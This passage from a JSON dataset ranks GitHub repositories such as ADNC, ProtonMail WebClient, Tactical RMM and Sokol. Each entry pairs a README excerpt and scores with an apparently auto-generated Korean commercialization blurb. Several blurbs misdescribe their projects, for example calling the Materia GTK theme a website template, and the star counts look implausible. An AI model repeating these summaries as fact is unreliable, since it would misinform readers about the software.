보물인가\n기업의 업무 시스템을 빠르게 구축할 수 있는 설계 틀(프레임워크)이라, 소프트웨어 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 인사관리, 재무관리 웹 플랫폼을 빠르게 출시\n- **내부 업무 도구**: 대기업의 직원 관리, 문서 승인,","readme_excerpt":"# <div align=\"center\"><img src=\"./docs/assets/images/adnc-github.png\" alt=\"ADNC A pragmatic .NET 8 framework for modular monoliths to evolve seamlessly into distributed microservices.\" style=\"zoom:50%;\" /></div>\n\n<div align=\"center\">\n  <a href=\"./LICENSE\"><img alt=\"GitHub license\" src=\"https://img.shields.io/github/license/AlphaYu/Adnc\"/></a>\n  <a href=\"https://github.com/AlphaYu/Adnc/stargazers\"><img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/AlphaYu/Adnc\"/></a>\n  <a href=\"https://github.com/AlphaYu/Adnc/network\"><img alt=\"GitHub forks\" src=\"https://img.shields.io/github/forks/AlphaYu/Adnc\"/></a>\n  <img alt=\"Visitors\" src=\"https://komarev.com/ghpvc/?username=alphayu&color=red&label=Visitors\"/>\n</div>\n<p align=\"center\">\n  A pragmatic .NET 8 framework for modular monoliths to evolve seamlessly into distributed microservices.\n</p>\n<p align=\"center\">\n  <a href=\"#why-adnc\">Why ADNC</a> ·\n  <a href=\"#design-principles\">Design Principles</a> ·\n  <a href=\"#architecture-at-a-g","composite_score":0.0276,"license_safety_tag":"safe"},{"name":"ProtonMail/WebClient","github_url":"https://github.com/ProtonMail/WebClient","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# ProtonMail/WebClient 분석\n\n## 왜 보물인가\n개인정보 보호를 최우선으로 하는 안전한 이메일 서비스의 핵심 기술로, 신뢰성이 필요한 모든 조직에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 이메일 SaaS**: 개인정보 유출 우려가 있는 기업과 개인을 위한 암호화 이메일 서비스 제공\n2. **규제 준수 솔루션**: GDP","readme_excerpt":"# Web clients\n\nThis project is a monorepo hosting the Proton web clients. It includes the web applications, their dependencies & shared modules as well as all tooling surrounding development of the web clients (as well as some additional miscellaneous things).\n\n- <img src=\"./applications/mail/src/favicon.svg\" style=\"vertical-align: middle\" height=\"20\" width=\"20\" /> <span style=\"vertical-align: middle; display: inline-block\">Proton Mail</span>\n- <img src=\"./applications/calendar/src/favicon.svg\" style=\"vertical-align: middle\" height=\"20\" width=\"20\" /> <span style=\"vertical-align: middle; display: inline-block\">Proton Calendar</span>\n- <img src=\"./applications/drive/src/favicon.svg\" style=\"vertical-align: middle\" height=\"20\" width=\"20\" /> <span style=\"vertical-align: middle; display: inline-block\">Proton Drive</span>\n- <img src=\"./applications/account/src/favicon.svg\" style=\"vertical-align: middle\" height=\"20\" width=\"20\" /> <span style=\"vertical-align: middle; display: inline-block\">Prot","composite_score":0.0275,"license_safety_tag":"safe"},{"name":"wh1te909/tacticalrmm","github_url":"https://github.com/wh1te909/tacticalrmm","stars":8,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# Tactical RMM 상용화 분석\n\n## 왜 보물인가\n원격 컴퓨터 관리 전문가들이 수동으로 수백 대의 장비를 관리하느라 낭비하는 시간을 자동화로 대폭 줄일 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **IT 관리 SaaS 서비스**: 중소기업 IT팀을 위해 \"월 9,900원에 직원 PC 100대를 한 곳에서 관리하세요\"라는 클라우","readme_excerpt":"# Tactical RMM\n\n![CI Tests](https://github.com/amidaware/tacticalrmm/actions/workflows/ci-tests.yml/badge.svg?branch=develop)\n[![codecov](https://codecov.io/gh/amidaware/tacticalrmm/branch/develop/graph/badge.svg?token=8ACUPVPTH6)](https://codecov.io/gh/amidaware/tacticalrmm)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/python/black)\n\nTactical RMM is a remote monitoring & management tool, built with Django and Vue.\\\nIt uses an [agent](https://github.com/amidaware/rmmagent) written in golang and integrates with [MeshCentral](https://github.com/Ylianst/MeshCentral)\n\n# [LIVE DEMO](https://demo.tacticalrmm.com/)\n\nDemo database resets every hour. A lot of features are disabled for obvious reasons due to the nature of this app.\n\n### [Discord Chat](https://discord.gg/upGTkWp)\n\n### [Documentation](https://docs.tacticalrmm.com)\n\n## Features\n\n- Teamviewer-like remote desktop control\n- Real-time remote shell\n- Remote file browser (download ","composite_score":0.0274,"license_safety_tag":"unknown"},{"name":"rcmaehl/MSEdgeRedirect","github_url":"https://github.com/rcmaehl/MSEdgeRedirect","stars":5,"language":"AutoIt","license":"LGPL-3.0","abandonment_months":1,"description":"# MSEdgeRedirect 상품화 분석\n\n## 왜 보물인가\n마이크로소프트 엣지 브라우저를 다른 브라우저로 자동 전환해주는 도구로, 사용자가 원치 않는 브라우저 강제 사용을 막아주는 실질적인 문제 해결책입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 도구**: 윈도우 사용 기업이 직원들의 브라우저 선택권을 보장하면서 IT 정책을 관리하는 Sa","readme_excerpt":"[![Latest download count](https://img.shields.io/github/downloads/rcmaehl/MSEdgeRedirect/latest/total)](https://github.com/rcmaehl/MSEdgeRedirect/releases/latest/)\n[![Chocolatey download count](https://img.shields.io/chocolatey/dt/msedgeredirect?label=Chocolatey+downloads)](https://chocolatey.org/packages/msedgeredirect)\n[![Ko-fi](https://img.shields.io/badge/Support%20me%20on-Ko--fi-FF5E5B.svg?logo=ko-fi)](https://ko-fi.com/rcmaehl)\n[![PayPal](https://img.shields.io/badge/Donate%20on-PayPal-00457C.svg?logo=paypal)](https://www.paypal.com/donate/?hosted_button_id=YL5HFNEJAAMTL)\n[![Join the Discord chat](https://img.shields.io/discord/728710400367001650?logo=discord)](https://discord.gg/uBnBcBx)\n\n# MSEdgeRedirect\nA Tool to Redirect News, Search, Widgets, Weather, and More to Your Default Browser\n\nThis tool filters and passes the command line arguments of Microsoft Edge processes into your default browser instead of hooking into the `microsoft-edge:` handler, this should provide resilien","composite_score":0.0273,"license_safety_tag":"restricted"},{"name":"staudenmeir/laravel-adjacency-list","github_url":"https://github.com/staudenmeir/laravel-adjacency-list","stars":9,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Laravel Adjacency List 저장소 분석\n\n## 왜 보물인가\n조직도, 카테고리 분류, 댓글 계층 구조 같은 \"계층적 관계\"를 간단하게 관리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 조직 관리 플랫폼**: 회사의 부서/팀/직원 구조를 자동으로 정렬하고 권한 관리\n2. **내부 도구 - 전자상거래 카테고리","readme_excerpt":"# Laravel Adjacency List\n\n[![CI](https://github.com/staudenmeir/laravel-adjacency-list/actions/workflows/ci.yml/badge.svg)](https://github.com/staudenmeir/laravel-adjacency-list/actions/workflows/ci.yml?query=branch%3Amain)\n[![Code Coverage](https://codecov.io/gh/staudenmeir/laravel-adjacency-list/graph/badge.svg?token=VhZ3oBh1YE)](https://codecov.io/gh/staudenmeir/laravel-adjacency-list)\n[![PHPStan](https://img.shields.io/badge/PHPStan-level%209-brightgreen.svg?style=flat)](https://github.com/staudenmeir/laravel-adjacency-list/actions/workflows/static-analysis.yml?query=branch%3Amain)\n[![Latest Stable Version](https://poser.pugx.org/staudenmeir/laravel-adjacency-list/v/stable)](https://packagist.org/packages/staudenmeir/laravel-adjacency-list)\n[![Total Downloads](https://poser.pugx.org/staudenmeir/laravel-adjacency-list/downloads)](https://packagist.org/packages/staudenmeir/laravel-adjacency-list/stats)\n[![License](https://poser.pugx.org/staudenmeir/laravel-adjacency-list/license)](ht","composite_score":0.0273,"license_safety_tag":"safe"},{"name":"rizinorg/llvm-capstone","github_url":"https://github.com/rizinorg/llvm-capstone","stars":7,"language":"LLVM","license":"NOASSERTION","abandonment_months":2,"description":"# rizinorg/llvm-capstone 상용화 분석\n\n## 왜 보물인가\n컴퓨터 프로그램의 동작을 분석하고 보안 위협을 찾아내는 핵심 기술로, 사이버 보안 업체와 소프트웨어 개발사들이 반드시 필요로 하는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 사이버 보안 분석 SaaS**\n- 기업 고객이 자사 프로그램의 보안 취약점을 온라인으로 검사하는 서비","readme_excerpt":"# Capstone's LLVM with refactored TableGen backends\n\nThis LLVM version has the purpose to generate code for the\n[Capstone disassembler](https://github.com/capstone-engine/capstone).\n\nIt refactors the TableGen emitter backends, so they can emit C code\nin addition to the C++ code they normally emit.\n\n## Build\n\n```\npython3 -m venv .venv\nsource .venv/bin/activate\npip install Ninja cmake\nmkdir build\ncd build\ncmake -G Ninja -DCMAKE_BUILD_TYPE=Debug ../llvm\ncmake --build . --target llvm-tblgen --config Debug\n```\n\n## Code generation\n\nPlease note that within LLVM we speak of a `Target` if we refer to an architecture.\n\n### Relevant files\n\nThe TableGen emitter backends are located in `llvm/utils/TableGen/`.\n\nThe target definition files (`.td`), which define the\ninstructions, operands, features etc., can be\nfound in `llvm/lib/Target/<ARCH>/`.\n\n### Code generation overview\n\nGenerating code for a target has 6 steps:\n\n```\n                                                                         5     ","composite_score":0.0271,"license_safety_tag":"unknown"},{"name":"floooh/sokol","github_url":"https://github.com/floooh/sokol","stars":10,"language":"C","license":"Zlib","abandonment_months":0,"description":"# Sokol 저장소 분석\n\n## 왜 보물인가\n게임이나 그래픽 애플리케이션을 만드는 데 필요한 핵심 도구 모음으로, 개발자들이 복잡한 설정 없이 바로 시작할 수 있는 간단한 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 플랫폼 (SaaS)**\n- 브라우저에서 게임을 만들고 공유할 수 있는 온라인 서비스로 제공\n\n**2. 교육용 프로그래밍","readme_excerpt":"<p align=\"center\">\n    <img src=\"assets/logo_full_large.png\" style=\"width: 60%\" /><br/><br/>Simple\n    <a href=\"https://github.com/nothings/stb/blob/master/docs/stb_howto.txt\">STB-style</a>\n    cross-platform libraries for C and C++, written in C.<br/><br/>\n</p>\n\n# Sokol\n\n[**See what's new**](https://github.com/floooh/sokol/blob/master/CHANGELOG.md) (**11-May-2026**: new header: sokol_framebuffer.h)\n\n[![Build](/../../actions/workflows/main.yml/badge.svg)](/../../actions/workflows/main.yml) [![Bindings](/../../actions/workflows/gen_bindings.yml/badge.svg)](/../../actions/workflows/gen_bindings.yml) [![build](https://github.com/floooh/sokol-zig/actions/workflows/main.yml/badge.svg)](https://github.com/floooh/sokol-zig/actions/workflows/main.yml) [![build](https://github.com/floooh/sokol-nim/actions/workflows/main.yml/badge.svg)](https://github.com/floooh/sokol-nim/actions/workflows/main.yml) [![Odin](https://github.com/floooh/sokol-odin/actions/workflows/main.yml/badge.svg)](https://gith","composite_score":0.027,"license_safety_tag":"safe"},{"name":"composer/pcre","github_url":"https://github.com/composer/pcre","stars":6,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# composer/pcre 저장소 분석\n\n## 왜 보물인가\n텍스트 패턴을 찾고 검증하는 핵심 기능을 제공하는 검증 도구로, 이메일·전화번호·웹사이트 주소 확인 등 거의 모든 온라인 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입 폼에서 입력값 자동 검증하고 부정 가입 차단하는 안내 서비스\n2. **내부 업무 도구*","readme_excerpt":"composer/pcre\n=============\n\nPCRE wrapping library that offers type-safe `preg_*` replacements.\n\nThis library gives you a way to ensure `preg_*` functions do not fail silently, returning\nunexpected `null`s that may not be handled.\n\nAs of 3.0 this library enforces [`PREG_UNMATCHED_AS_NULL`](#preg_unmatched_as_null) usage\nfor all matching and replaceCallback functions, [read more below](#preg_unmatched_as_null)\nto understand the implications.\n\nIt thus makes it easier to work with static analysis tools like PHPStan or Psalm as it\nsimplifies and reduces the possible return values from all the `preg_*` functions which\nare quite packed with edge cases. As of v2.2.0 / v3.2.0 the library also comes with a\n[PHPStan extension](#phpstan-extension) for parsing regular expressions and giving you even better output types.\n\nThis library is a thin wrapper around `preg_*` functions with [some limitations](#restrictions--limitations).\nIf you are looking for a richer API to handle regular expressions hav","composite_score":0.0268,"license_safety_tag":"safe"},{"name":"Scanate/EthList","github_url":"https://github.com/Scanate/EthList","stars":8,"language":"","license":"unknown","abandonment_months":1,"description":"# EthList 저장소 분석\n\n## 왜 보물인가\n이더리움 블록체인 관련 정보를 체계적으로 정리한 자료로, 암호화폐 투자자나 개발자들이 신뢰할 수 있는 참고 자료로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 정보 서비스**: 이더리움 프로젝트 검색 및 필터링 기능을 제공하는 웹사이트 운영\n2. **투자 분석 도구**: 투자자들이 이더","readme_excerpt":"# EthList: The Crowdsourced Ethereum Reading List</p>\n### Found a great resource? Add it by submitting a Pull Request!\n\nContributors: Kingsong Chen (Scanate), Robert Hackett (Fortune Magazine), Jorge Izquierdo and Luis Cuende (Aragon), Jake Brukhman (CoinFund), Maksim Balashevich (Santiment), Michal Brazewicz (Status), Nate Rush, Krishna Aradhi, Justin Poirier, Griff Green (Giveth.io), Eeks, Anonymous\n\n<a href=\"http://twitter.com/home?status=Check%20out%20this%20awesome%20Ethereum%20Reading%20List:%20www.scanate.co/eth\">Tweet about this list!</a>\n\n| [Introduction](#introduction) | [Getting Started](#getting-started) | [Ecosystem](#ecosystem) | [Thought Pieces](#thought-pieces) | [Trading](#trading) | [Programming](#programming) | [Legal](#legal)\n| ------------- | ------------- | ------------- | ------------- | ------------- | ------------- | ------------- |\n\n\n## Introduction\n\n#### Simple explanations of Ethereum\n- [ ] [Blockchain Demo - Visual demonstration of blockchain technologies](","composite_score":0.0266,"license_safety_tag":"unknown"},{"name":"openrazer/openrazer","github_url":"https://github.com/openrazer/openrazer","stars":7,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# OpenRazer 저장소 분석\n\n## 왜 보물인가\nRazer 게이밍 기기(마우스, 키보드 등)를 Linux 운영체제에서 자유롭게 제어할 수 있게 하는 오픈소스 프로젝트로, 폐쇄적인 게이밍 기기 시장에 개방성을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게이밍 설정 클라우드 동기화 SaaS**\n- Razer 기기 사용자들이 여러 컴퓨터에서 일관된 ","readme_excerpt":"# [OpenRazer](https://openrazer.github.io/)\n\nA collection of Linux drivers for Razer devices - providing kernel drivers, DBus services and Python bindings to interact with the DBus interface.\n\n## Something not working?\n\nSometimes there are problems with the driver installation due to missing kernel modules or secure boot. Please refer to the [Troubleshooting wiki page](https://github.com/openrazer/openrazer/wiki/Troubleshooting) for guidance.\n\nIf the troubleshooting guide did not pinpoint the problem, [try searching open/closed issues](https://github.com/openrazer/openrazer/issues?q=is%3Aissue+) before creating a new one.\n\n---\n\n## Installation\n\nOfficial packages are available for these distributions (and their derivatives):\n\n* [Debian](https://openrazer.github.io/#debian)\n* [Fedora](https://openrazer.github.io/#fedora)\n* [Mageia](https://openrazer.github.io/#mageia)\n* [openSUSE](https://openrazer.github.io/#opensuse)\n* [Ubuntu](https://openrazer.github.io/#ubuntu)\n\nCommunity supported ","composite_score":0.0266,"license_safety_tag":"restricted"},{"name":"supabase/supabase-js","github_url":"https://github.com/supabase/supabase-js","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# supabase/supabase-js 분석 보고서\n\n## 왜 보물인가\n데이터베이스 없이도 웹사이트나 앱을 만들 수 있게 도와주는 핵심 도구로, 수천 개의 개발자 프로젝트에서 기본이 되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 공유 앱, 할일 관리 서비스 등 사용자별 데이터를 저장해야 하는 웹/모바일 서비스\n2. **내부","readme_excerpt":"<br />\n<p align=\"center\">\n  <a href=\"https://supabase.io\">\n        <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/supabase-logo-wordmark--dark.svg\">\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/supabase-logo-wordmark--light.svg\">\n      <img alt=\"Supabase Logo\" width=\"300\" src=\"https://raw.githubusercontent.com/supabase/supabase/master/packages/common/assets/images/logo-preview.jpg\">\n    </picture>\n  </a>\n\n  <h1 align=\"center\">Supabase JS SDK</h1>\n\n  <p align=\"center\">\n    <a href=\"https://supabase.com/docs/guides/getting-started\">Guides</a>\n    ·\n    <a href=\"https://supabase.com/docs/reference/javascript/introduction\">Reference Docs</a>\n  </p>\n</p>\n\n<div align=\"center\">\n\n[![Build](https://github.com/supabase/supabase-js/workflows/CI/badge.svg)](https://github.com/supabase/s","composite_score":0.0266,"license_safety_tag":"safe"},{"name":"lc-soft/LCUI","github_url":"https://github.com/lc-soft/LCUI","stars":7,"language":"C","license":"mit","abandonment_months":1,"description":"# LCUI 프로젝트 분석\n\n## 왜 보물인가\n복잡한 화면 구성을 간단하게 만들어주는 개발 기초 도구로, 프로그래머들이 소프트웨어를 더 빠르고 쉽게 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 이 도구를 활용하여 관리 화면이나 대시보드가 필요한 웹 기반 업무 소프트웨어를 빠르게 개발\n2. **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\r\n  <a href=\"http://lcui.org/\">\r\n    <img src=\"https://lcui.org/img/logo.png\" alt=\"logo\" width=72 height=72>\r\n  </a>\r\n  <h3 align=\"center\">LCUI</h3>\r\n  <p align=\"center\">\r\n    The C library for build user interfaces\r\n  </p>\r\n  <p align=\"center\">\r\n    <a href=\"https://github.com/lc-soft/LCUI/actions\"><img alt=\"GitHub Actions\" src=\"https://github.com/lc-soft/LCUI/workflows/C%2FC%2B%2B%20CI/badge.svg\"></a>\r\n    <a href=\"https://codecov.io/gh/lc-soft/LCUI\"><img src=\"https://codecov.io/gh/lc-soft/LCUI/branch/develop/graph/badge.svg\" /></a>\r\n    <img src=\"https://img.shields.io/github/repo-size/lc-soft/LCUI.svg\" alt=\"Repo size\">\r\n    <img src=\"https://img.shields.io/github/languages/code-size/lc-soft/LCUI.svg\" alt=\"Code size\">\r\n  </p>\r\n</p>\r\n\r\n## Introduction\r\n\r\n[中文版说明文档](README.zh-cn.md)\r\n\r\nLCUI is a library written in C for building graphical user interfaces. Its goal is to explore and practice new ways of developing user interfaces, characterized by its small size, ease ","composite_score":0.0265,"license_safety_tag":"safe"},{"name":"reactjs/reselect","github_url":"https://github.com/reactjs/reselect","stars":8,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Reselect 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션이 반복 작업을 피하고 빠르게 동작하도록 돕는 핵심 도구로, 많은 기업에서 이미 널리 사용 중입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 대시보드 서비스**: 고객 데이터를 실시간으로 표시하는 분석 플랫폼의 성능 최적화\n2. **전자상거래 관리 도구**: 상품 목록, 재고, 주문 정","readme_excerpt":"# Reselect\n\n[![npm package][npm-badge]][npm][![Coveralls][coveralls-badge]][coveralls][![GitHub Workflow Status][build-badge]][build]![TypeScript][typescript-badge]\n\nA library for creating memoized \"selector\" functions. Commonly used with Redux, but usable with any plain JS immutable data as well.\n\n- Selectors can compute derived data, allowing [Redux] to store the minimal possible state.\n- Selectors are efficient. A selector is not recomputed unless one of its arguments changes.\n- Selectors are composable. They can be used as input to other selectors.\n\nThe **Redux docs usage page on [Deriving Data with Selectors](https://redux.js.org/usage/deriving-data-selectors)** covers the purpose and motivation for selectors, why memoized selectors are useful, typical Reselect usage patterns, and using selectors with [React-Redux].\n\n## Installation\n\n### Redux Toolkit\n\nWhile Reselect is not exclusive to [Redux], it is already included by default in [the official Redux Toolkit package](https://redu","composite_score":0.0265,"license_safety_tag":"safe"},{"name":"nana-4/materia-theme","github_url":"https://github.com/nana-4/materia-theme","stars":6,"language":"SCSS","license":"gpl-2.0","abandonment_months":2,"description":"# Materia Theme 상용화 분석\n\n## 왜 보물인가\n웹사이트를 쉽게 꾸밀 수 있는 디자인 템플릿으로, 전문가 없이도 전문적인 모습의 사이트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업이 자체 웹사이트를 구축할 때 필요한 디자인 템플릿 구독 서비스\n- **내부 업무 도구**: 웹 기반 관리 시스템의 기본 디","readme_excerpt":"<img src=\"images/materia-logo.svg\" alt=\"materia-logo\" align=\"right\" />\n\n# Materia\n\nMateria is a [Material Design](https://material.io) theme for GNOME/GTK based desktop environments.\n\nIt supports GTK 2, GTK 3, GTK 4, GNOME Shell, Budgie, Cinnamon, MATE, Unity, Xfce, LightDM, GDM, Chrome theme, etc.\n\n## Previews\n\n![widget-factory](images/widget-factory.png?raw=true)\n![widget-factory-dark](images/widget-factory-dark.png?raw=true)\n\n## Features\n\nSupports **ripple animations** for GTK 3 and 4:\n\n![ripple](images/ripple.gif?raw=true)\n\n**3 color variants** and **2 size variants** are available:\n\n**Materia** | **standard** | **compact**\n:-: | :-: | :-:\n**standard** | ![Materia][1] | ![Materia-compact][2]\n**dark** | ![Materia-dark][3] | ![Materia-dark-compact][4]\n**light** | ![Materia-light][5] | ![Materia-light-compact][6]\n\n[1]: images/Materia.png?raw=true\n[2]: images/Materia-compact.png?raw=true\n[3]: images/Materia-dark.png?raw=true\n[4]: images/Materia-dark-compact.png?raw=true\n[5]: images/Mat","composite_score":0.0263,"license_safety_tag":"restricted"},{"name":"moneyphp/money","github_url":"https://github.com/moneyphp/money","stars":17,"language":"PHP","license":"mit","abandonment_months":1,"description":"# moneyphp/money 상용화 분석\n\n## 왜 보물인가\n온라인 쇼핑몰, 금융앱, 결제 시스템 등 돈을 다루는 모든 디지털 서비스에서 정확한 금액 계산을 보장하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 회계 소프트웨어**\n- 중소기업 고객의 송금, 청구, 결산을 정확하게 처리하는 서비스로 월 구독료 수익","readme_excerpt":"# Money\n\n[![Latest Version](https://img.shields.io/github/release/moneyphp/money.svg?style=flat-square)](https://github.com/moneyphp/money/releases)\n![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/moneyphp/money/ci.yml?branch=master&style=flat-square)\n[![Total Downloads](https://img.shields.io/packagist/dt/moneyphp/money.svg?style=flat-square)](https://packagist.org/packages/moneyphp/money)\n\n[![Email](https://img.shields.io/badge/email-team@moneyphp.org-blue.svg?style=flat-square)](mailto:team@moneyphp.org)\n\n![Money PHP](/resources/logo.png?raw=true)\n\nPHP library to make working with money safer, easier, and fun!\n\n> \"If I had a dime for every time I've seen someone use FLOAT to store currency, I'd have $999.997634\" -- [Bill Karwin](https://twitter.com/billkarwin/status/347561901460447232)\n\nIn short: You shouldn't represent monetary values by a float Wherever\nyou need to represent money, use this Money value object. Since version\n3.0 this library uses [st","composite_score":0.0262,"license_safety_tag":"safe"},{"name":"chipsalliance/chisel3","github_url":"https://github.com/chipsalliance/chisel3","stars":5,"language":"Scala","license":"Apache-2.0","abandonment_months":0,"description":"# Chisel3 저장소 분석\n\n## 왜 보물인가\n컴퓨터 칩 설계를 마치 일반 프로그래밍하듯 쉽게 할 수 있는 도구로, 반도체 업계의 생산성을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **칩 설계 클라우드 SaaS**: 기업들이 온라인에서 직접 칩 설계를 하고 검증할 수 있는 웹 서비스\n2. **반도체 회사 내부 도구**: 삼성, SK","readme_excerpt":"<a href=\"https://www.chisel-lang.org\">\n  <img src=\"https://raw.githubusercontent.com/chipsalliance/chisel/main/docs/src/images/chisel_logo.svg?sanitize=true\" height=\"60\">\n</a>\n<a href=\"https://www.chipsalliance.org\">\n  <img align=\"right\" src=\"https://raw.githubusercontent.com/chipsalliance/.github/main/profile/images/chips_alliance.svg?sanitize=true\" height=\"60\">\n</a>\n\nThe **Constructing Hardware in a Scala Embedded Language** ([**Chisel**](https://www.chisel-lang.org)) is an open-source hardware description language (HDL) used to describe digital electronics and circuits at the register-transfer level that facilitates **advanced circuit generation and design reuse for both ASIC and FPGA digital logic designs**.\n\nChisel adds hardware construction primitives to the [Scala](https://www.scala-lang.org) programming language, providing designers with the power of a modern programming language to write complex, parameterizable circuit generators that produce synthesizable Verilog.\nThis gener","composite_score":0.0261,"license_safety_tag":"safe"},{"name":"kyazdani42/nvim-tree.lua","github_url":"https://github.com/kyazdani42/nvim-tree.lua","stars":6,"language":"Lua","license":"NOASSERTION","abandonment_months":0,"description":"# nvim-tree.lua 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 파일 관리 도구를 더 빠르고 편하게 만드는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 도구 SaaS**: 클라우드 기반 코딩 환경(예: GitHub Codespaces, Replit)에 통합하여 파일 탐색 기능 강화\n2. **기업 내부 개발 도","readme_excerpt":"# A File Explorer For Neovim Written In Lua\n\n[![CI](https://github.com/nvim-tree/nvim-tree.lua/actions/workflows/ci.yml/badge.svg)](https://github.com/nvim-tree/nvim-tree.lua/actions/workflows/ci.yml)\n\n<img align=\"left\" width=\"199\" height=\"598\" src=\"https://user-images.githubusercontent.com/1505378/232662694-8dc494e0-24da-497a-8541-29344293378c.png\">\n<img align=\"left\" width=\"199\" height=\"598\" src=\"https://user-images.githubusercontent.com/1505378/232662698-2f321315-c67a-486b-85d8-8c391de52392.png\">\n\n   Automatic updates\n\n   File type icons\n\n   Git integration\n\n   Diagnostics integration: LSP and COC\n\n   (Live) filtering\n\n   Cut, copy, paste, rename, delete, create\n\n   Highly customisable\n\n<br clear=\"left\"/>\n<br />\n\nTake a look at the [wiki](https://github.com/nvim-tree/nvim-tree.lua/wiki) for Showcases, Tips, Recipes and more.\n\nQuestions and general support: [Discussions](https://github.com/nvim-tree/nvim-tree.lua/discussions)\n\n<!-- \nhttps://github.com/jonschlinkert/markdown-toc\nmarkdo","composite_score":0.0261,"license_safety_tag":"unknown"},{"name":"intel/gmmlib","github_url":"https://github.com/intel/gmmlib","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":2,"description":"# intel/gmmlib 저장소 분석\n\n## 왜 보물인가\n인텔이 만든 그래픽 처리 기술로, 컴퓨터가 영상과 게임을 더 빠르고 효율적으로 처리할 수 있게 해주는 핵심 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 스트리밍 서비스**: 클라우드 게임을 제공하는 서비스에서 고품질 영상을 저렴하게 전송\n2. **기업용 그래픽 솔루션**: 건축 설계나","readme_excerpt":"\nIntel(R) Graphics Memory Management Library\n*******************************************\n\nIntroduction\n=============\n\nThe Intel(R) Graphics Memory Management Library provides device specific and buffer\nmanagement for the Intel(R) Graphics Compute Runtime for OpenCL(TM) and the\nIntel(R) Media Driver for VAAPI.\n\nLicense\n========\n\nThe Intel(R) Graphics Memory Management Library is distributed under the MIT\nOpen Source license.\n\nYou may obtain a copy of the License at:\n\nhttps://opensource.org/licenses/MIT\n\nBuilding\n========\n1) Get gmmlib repository\n\n   ``$ git clone https://github.com/intel/gmmlib.git``\n\n2) Change it to root directory\n\n   ``$ cd gmmlib``\n\n3) Make a build directory\n\n   ``$ mkdir build && cd build``\n\n4) Run the cmake command to prepare build files\n\n|        ``$ cmake [-DCMAKE_BUILD_TYPE=Release | Debug | ReleaseInternal] ..``\n|        where,\n|        -DCMAKE_BUILD_TYPE can be set to one build type flag at a time.\n|        Example:\n|        ``$ cmake -DCMAKE_BUILD_TYPE=Releas","composite_score":0.0261,"license_safety_tag":"unknown"},{"name":"IBM/type","github_url":"https://github.com/IBM/type","stars":11,"language":"CSS","license":"OFL-1.1","abandonment_months":0,"description":"# IBM/type 저장소 분석\n\n## 왜 보물인가\nIBM이 개발한 글꼴 기술로, 대규모 기업의 디지털 제품에서 통일된 브랜드 이미지를 만드는 데 필수적인 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 디자인 시스템 SaaS**: 대기업들이 모든 제품에서 일관된 글꼴을 사용하도록 관리하는 클라우드 서비스\n2. **브랜드 자산 내부 도구**: 마케팅팀","readme_excerpt":"# IBM Plex® typeface\n\n<p align=\"center\">\n  <a href=\"https://www.ibm.com/plex/\">\n    <img alt=\"Plex\" src=\"https://i.imgur.com/yB9xz60.jpg\" />\n  </a>\n</p>\n\nMeet the IBM Plex® typeface, our corporate typeface family. It’s global, it’s versatile and it’s distinctly IBM.\n\nWe designed the IBM Plex typeface carefully to meet our needs as a global tech company and express who we are as IBMers. It took two years and a lot of work to get here, but today, we have a signature typeface we’re proud of and excited to share with the world. Discover more about our development of the [IBM Plex typeface](https://www.ibm.com/plex/).\n\nThe IBM Plex typeface is an open-source project available for download and various uses following the Open Font License (OFL). The IBM Plex family comes in Sans, Serif, Mono, and Sans Condensed, all with Roman and true italics. Plex has been designed to work well in user interface (UI) environments and other mediums. This project provides all source files and multiple formats","composite_score":0.0261,"license_safety_tag":"unknown"},{"name":"postgraphql/postgraphql","github_url":"https://github.com/postgraphql/postgraphql","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# PostGraphQL 저장소 분석\n\n## 왜 보물인가\n데이터베이스만 있으면 자동으로 웹 서비스를 만들어주는 도구로, 개발자가 복잡한 코딩 없이 빠르게 서비스를 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 협업 도구나 프로젝트 관리 플랫폼의 백엔드 자동 구축\n- **내부 업무 도구**: 회사 직원들이 사용하는 데이터","readme_excerpt":"# 🔮 Graphile's Crystal Monorepo\n\n[![GitHub 